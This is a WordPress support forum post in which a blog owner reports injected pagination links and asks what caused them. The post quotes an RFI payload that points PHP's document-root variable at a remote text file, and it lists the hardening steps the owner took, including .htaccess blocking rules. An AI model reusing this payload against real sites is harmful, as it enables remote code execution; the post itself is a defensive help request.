Long post below, but my thanks in advance for taking the time to read this. My blog was recently hacked and I have been struggling for a week to figure out how it was done. Here’s my blog:

    http://theawesomer.com

    The hack manifests itself if you click on the page numbers at the bottom of the page. E.g., the links have been changed from:

    http://theawesomer.com/page/2/

    to:

    http://theawesomer.com/page/2/?_SERVERDOCUMENT_ROOT=http%3A%2F%2Fwww.peb.com.ua%2Fua%2Freadme.txt%3F%3F%3F

    Several notes:
    1. The hack doesn’t seem to do anything, and may have been a failed attempt. It doesn’t actually redirect or launch any application.
    2. The file it’s trying to access is http://www.peb.com.ua/ua/readme.txt. I’m not much of a developer so I have no idea what it’s trying to do.
    3. These modified links are seen on the site itself, not just server logs and traffic statistics. I’ve seen them myself, as have several colleagues and concerned visitors.
    4. The modified links are transient. I have personally seen the hacked links there one minute, gone the next, despite having done nothing on my end. The majority of visitors never see these hacked links.

    I am a total neophyte to hacking, but after some googling I think I narrowed it down to an RFI (remote file inclusion) hack. I followed the instructions here:

    http://blogingenuity.com/2009/05/14/remote-file-inclusion-rfi-attempts-detecting-tracking-and-mitigating/#more-369

    … and turned Off register_globals, allow_url_fopen, and allow_url_include. They were all set to On previously.

    I also:
    1. Upgraded WordPress from 2.6 to 2.8.1 (and now 2.8.2 with the XSS fix)
    2. Upgraded all plugins
    3. Set .htaccess to block libwww-perl and prevent query strings with “http” in them
    4. Set Super Cache to stop caching /page/.

    I paid special attention to my pagination plugin, since that’s where the hack manifests itself. I was previously using Lester Chan’s WP-pagenavi which I upgraded along with WordPress. The result — no change. So, I tried another pagination plugin, WP Page Numbers — still no change.

    By far the most effective measure has been setting Super Cache to stop caching /page/, but this has not stopped the hacks completely.

    I still see them in my Apache logs. The IPs seem to be legitimate traffic (normal visitors), proven by the fact that I and my friends have seen the same hacked links on our computers. Shouldn’t an RFI attack originate remotely? Why has it been able to actually modify my links?

    I’ve even downloaded a complete copy of all files in my public_html directory (including all WordPress files) and exported my MySQL database to search for any trace of the hack — “peb.com.ua” or “DOCUMENT_ROOT” — and it’s just not there.

    So, I guess my questions are these: What exactly is happening to my site, and how do I keep it from happening again?

    Thank you!

The topic ‘Possible RFI hacking attempt?’ is closed to new replies.